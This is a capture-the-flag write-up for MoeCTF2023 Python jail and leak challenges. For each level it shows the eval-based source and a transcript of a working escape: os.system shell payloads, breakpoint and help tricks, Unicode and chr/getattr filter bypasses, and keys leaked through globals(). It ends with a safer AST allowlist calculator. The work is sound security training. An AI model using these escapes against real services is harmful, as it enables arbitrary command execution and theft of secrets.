MoeCTF2023_Jail

Jail Level 0

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{7667mhPKkpUNu21zjvmy3RA9ZSJ3e5TM}

Jail Level 1

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{hYmKR3P74S0BxEnC_V2tQvY9aH22SI8E}

Jail Level 2

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>6:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> os
WARNING: terminal is not fully functional
Press RETURN to continue !sh

!sh
sh: 0: can't access tty; job control turned off
$ cat flag
flag{ywztaDtshMFvz7sQxM-U2VdFWqsGkK1u}

Jail Level 3

Source Code

import re
BANLIST = ['breakpoint']
BANLIST_WORDS = '|'.join(f'({WORD})' for WORD in BANLIST)
print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
  print("Oh hacker! Bye~")
  exit(0)
if re.findall(BANLIST_WORDS, user_input_data, re.I):
  raise Exception('Blacklisted word detected! you are hacker!')
print('Answer result: {}'.format(eval(user_input_data)))

exp

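Character-encoding bypass

s = 'breakpoint()'

# Python NFKC-normalizes identifiers when it parses source, so a compatibility
# character that maps to an ASCII letter resolves to the same name, while the
# regex in the filter compares the raw characters. IDNA nameprep applies a
# similar mapping (plus case folding) and is used here to enumerate candidates.
# Only identifier characters are normalized by the parser; the parenthesis
# look-alikes in the output are not valid Python syntax.
for i in range(128, 65537):
    tmp = chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        if res in s and len(res) > 0:
            print(f"ascii:{i}  A:{res}  U:{tmp}  payload:{s.replace(res,tmp)}")
    except UnicodeError:
        # code points the idna codec rejects are skipped
        pass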
# ascii:170  A:a  U:ª  payload:breªkpoint()
# ascii:186  A:o  U:º  payload:breakpºint()
# ascii:691  A:r  U:ʳ  payload:bʳeakpoint()
# ascii:8305  A:i  U:ⁱ  payload:breakpoⁱnt()
# ascii:8317  A:(  U:⁽  payload:breakpoint⁽)
# ascii:8318  A:)  U:⁾  payload:breakpoint(⁾
# ascii:8319  A:n  U:ⁿ  payload:breakpoiⁿt()
# ascii:8333  A:(  U:₍  payload:breakpoint₍)
# ascii:8334  A:)  U:₎  payload:breakpoint(₎
# ascii:8464  A:i  U:ℐ  payload:breakpoℐnt()
# ascii:8465  A:i  U:ℑ  payload:breakpoℑnt()
# ascii:8469  A:n  U:ℕ  payload:breakpoiℕt()
# ascii:8473  A:p  U:ℙ  payload:breakℙoint()
# ascii:8475  A:r  U:ℛ  payload:bℛeakpoint()
# ascii:8476  A:r  U:ℜ  payload:bℜeakpoint()
# ascii:8477  A:r  U:ℝ  payload:bℝeakpoint()
# ascii:8490  A:k  U:K  payload:breaKpoint()
# ascii:8492  A:b  U:ℬ  payload:ℬreakpoint()
# ascii:8495  A:e  U:ℯ  payload:brℯakpoint()
# ascii:8496  A:e  U:ℰ  payload:brℰakpoint()
# ascii:8500  A:o  U:ℴ  payload:breakpℴint()
# ascii:8505  A:i  U:ℹ  payload:breakpoℹnt()
# ascii:8519  A:e  U:ⅇ  payload:brⅇakpoint()
# ascii:8520  A:i  U:ⅈ  payload:breakpoⅈnt()
# ascii:8544  A:i  U:Ⅰ  payload:breakpoⅠnt()
# ascii:8560  A:i  U:ⅰ  payload:breakpoⅰnt()
# ascii:9398  A:a  U:Ⓐ  payload:breⒶkpoint()
# ascii:9399  A:b  U:Ⓑ  payload:Ⓑreakpoint()
# ascii:9402  A:e  U:Ⓔ  payload:brⒺakpoint()
# ascii:9406  A:i  U:Ⓘ  payload:breakpoⒾnt()
# ascii:9408  A:k  U:Ⓚ  payload:breaⓀpoint()
# ascii:9411  A:n  U:Ⓝ  payload:breakpoiⓃt()
# ascii:9412  A:o  U:Ⓞ  payload:breakpⓄint()
# ascii:9413  A:p  U:Ⓟ  payload:breakⓅoint()
# ascii:9415  A:r  U:Ⓡ  payload:bⓇeakpoint()
# ascii:9417  A:t  U:Ⓣ  payload:breakpoinⓉ()
# ascii:9424  A:a  U:ⓐ  payload:breⓐkpoint()
# ascii:9425  A:b  U:ⓑ  payload:ⓑreakpoint()
# ascii:9428  A:e  U:ⓔ  payload:brⓔakpoint()
# ascii:9432  A:i  U:ⓘ  payload:breakpoⓘnt()
# ascii:9434  A:k  U:ⓚ  payload:breaⓚpoint()
# ascii:9437  A:n  U:ⓝ  payload:breakpoiⓝt()
# ascii:9438  A:o  U:ⓞ  payload:breakpⓞint()
# ascii:9439  A:p  U:ⓟ  payload:breakⓟoint()
# ascii:9441  A:r  U:ⓡ  payload:bⓡeakpoint()
# ascii:9443  A:t  U:ⓣ  payload:breakpoinⓣ()
# ascii:13260  A:in  U:㏌  payload:breakpo㏌t()
# ascii:65077  A:(  U:︵  payload:breakpoint︵)
# ascii:65078  A:)  U:︶  payload:breakpoint(︶
# ascii:65113  A:(  U:﹙  payload:breakpoint﹙)
# ascii:65114  A:)  U:﹚  payload:breakpoint(﹚
# ascii:65288  A:(  U:(  payload:breakpoint()
# ascii:65289  A:)  U:)  payload:breakpoint()
# ascii:65313  A:a  U:A  payload:breAkpoint()
# ascii:65314  A:b  U:B  payload:Breakpoint()
# ascii:65317  A:e  U:E  payload:brEakpoint()
# ascii:65321  A:i  U:I  payload:breakpoInt()
# ascii:65323  A:k  U:K  payload:breaKpoint()
# ascii:65326  A:n  U:N  payload:breakpoiNt()
# ascii:65327  A:o  U:O  payload:breakpOint()
# ascii:65328  A:p  U:P  payload:breakPoint()
# ascii:65330  A:r  U:R  payload:bReakpoint()
# ascii:65332  A:t  U:T  payload:breakpoinT()
# ascii:65345  A:a  U:a  payload:breakpoint()
# ascii:65346  A:b  U:b  payload:breakpoint()
# ascii:65349  A:e  U:e  payload:breakpoint()
# ascii:65353  A:i  U:i  payload:breakpoint()
# ascii:65355  A:k  U:k  payload:breakpoint()
# ascii:65358  A:n  U:n  payload:breakpoint()
# ascii:65359  A:o  U:o  payload:breakpoint()
# ascii:65360  A:p  U:p  payload:breakpoint()
# ascii:65362  A:r  U:r  payload:breakpoint()
# ascii:65364  A:t  U:t  payload:breakpoint()
>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
cat flag
flag{Vg03aw9uswciSrMEbSuhsW7hyef89_k2}

Jail Level 4

Welcome to the MoeCTF2023 Jail challenge.This is a repeater and it repeats what you say!
python verison:2.7
> __import__('os').system('sh')
sh: 0: can't access tty; job control turned off
$ cat flag
flag{cAWccu_EE6gKWg1XWHB7uDTQY70IJWv2}

Jail Level 5

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
def func_filter(s):
  not_allowed = set('"\'`bid')
  return any(c in not_allowed for c in s)
user_input_data = input("> ")
if func_filter(user_input_data):
  print("Oh hacker! Bye~")
  exit(0)
if not user_input_data.isascii():
  print("Sorry we only ascii for this chall!")
  exit(0)
print('Answer result: {}'.format(eval(user_input_data)))

exp

Construct: ().__class__.__base__.__subclasses__()[-4].__init__.__globals__['system']('sh')

Bypass the character filter with getattr() and chr(): getattr(getattr(getattr(getattr(().__class__, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> getattr(getattr(getattr(getattr(().__class__, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))
ls
flag_9af31874439b2aad
server.py
cat flag_9af31874439b2aad
moectf{GsFYUbxaK8VNeW6ohhIn1N42EnqKv7PQ}

Leak Level 0

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")
def func_filter(s):
  not_allowed = set('vvvveeee')
  return any(c in not_allowed for c in s)
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>9):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_valid_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fc2f593cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_6366a131649a4e9b': '4e86eda06366a131649a4e9be1a9f217', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _  ___  \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | |/ _ \\ \n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| | | | |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ | | | |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ | |_| |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_|\\___/ \n                                  \\____/                                 \n
                                                             \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    def func_filter(s):\n      not_allowed = set(\'vvvveeee\')\n      return any(c in not_allowed for c in s)\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>9):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_valid_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7fc2f599e0e0>, 'challenge_choice': 'v', 'code': 'globals()'}
>>> b
Please enter the admin key
key >> 4e86eda06366a131649a4e9be1a9f217
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{E1iKuuMPXcNIYBamRpTdbCqmMeEHp8ud}

Leak Level 1

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
def func_filter(s):
  not_allowed = set('moe_dbt')
  return any(c in not_allowed for c in s)
print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>6):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_vailed_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> vars()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7feb7a85cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_ff8457ee50ed8d0f': '8d3d451fff8457ee50ed8d0f24881eac', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _ __ \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | /_ |\n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| || |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ || |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ || |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_||_|\n                                  \\____/
            \n
                                       \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    def func_filter(s):\n      not_allowed = set(\'moe_dbt\')\n      return any(c in not_allowed for c in s)\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>6):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_vailed_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7feb7a8be0e0>, 'challenge_choice': 'v', 'code': 'vars()'}
>>> b
Please enter the admin key
key >> 8d3d451fff8457ee50ed8d0f24881eac
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{tg2GYrhoUnsx6A_Na6qXnk3I4s0cibWH}

Leak Level 2

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")
def func_filter(s):
  not_allowed = set('dbtaaaaaaaaa!')
  return any(c in not_allowed for c in s)
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    print("you need to ")
    code = input("code >> ")
    if(len(code)>6):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    if not code.isascii():
      print("please use ascii only thanks!")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_vailed_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> __main__
Help on module __main__:

NAME
    __main__

FUNCTIONS
    func_filter(s)

DATA
    CHALLENGE_SOURCE_CODE = '\n    fake_key_into_local_but_valid_key_into_...
    WELCOME = '\n  __  __  ___       _      ______        _  __ ...       ...
    __annotations__ = {}
    challenge_choice = 'v'
    choice = 'e'
    code = 'help()'
    key_f5ee1754b2e73acf = '43610e2ef5ee1754b2e73acf35348dd5'

FILE
    /home/ctf/server.py
>>> b
Please enter the admin key
key >> 43610e2ef5ee1754b2e73acf35348dd5
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{bDLQw0_0cwm9Ef63vWy3rIQiy2xpM5uh}
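
Every level above ends in eval() on filtered input, and the length limits, word blocklist and character blocklists are each bypassed. As an added example (not part of the original write-up or the challenge code), the sketch below parses the input with ast and evaluates only numeric literals and arithmetic operators, then compares it with the Level 3 filter on inputs from the transcripts; safe_calc, parsed_name, level3_filter_blocks and the other helper names are hypothetical.

```python
import ast
import operator
import re

# Level 3's length check and blocklist, copied from the page for comparison.
BANLIST_WORDS = '|'.join(f'({w})' for w in ['breakpoint'])

def level3_filter_blocks(s):
    return len(s) > 12 or bool(re.findall(BANLIST_WORDS, s, re.I))

def parsed_name(src):
    """Identifier as the compiler sees it (NFKC-normalized at parse time)."""
    return ast.parse(src, mode="eval").body.id

# Allowlisted operators; ** is left out so input cannot request huge results.
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
       ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
       ast.Mod: operator.mod, ast.UAdd: operator.pos, ast.USub: operator.neg}

def safe_calc(expr, max_len=64):
    """Evaluate arithmetic on numeric literals; ValueError for any other syntax."""
    if len(expr) > max_len:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not an expression") from exc

    def walk(node):
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.operand))
        # Name, Call, Attribute, Subscript, ... are never evaluated.
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree.body)

def rejected_by_safe_calc(s):
    try:
        safe_calc(s)
    except ValueError:
        return True
    return False

# Inputs from the transcripts above; the second uses U+02B3 from the Level 3 table.
PAGE_INPUTS = ["breakpoint()", "b\u02b3eakpoint()", "help()", "vars()",
               "globals()", "__import__('os').system('sh')"]

if __name__ == "__main__":
    for s in PAGE_INPUTS:
        print(repr(s), level3_filter_blocks(s), rejected_by_safe_calc(s))
```

The Level 3 filter passes the U+02B3 spelling, help() and vars(), while the allowlist rejects all of them because a Call node is never evaluated, whatever the name is spelled like.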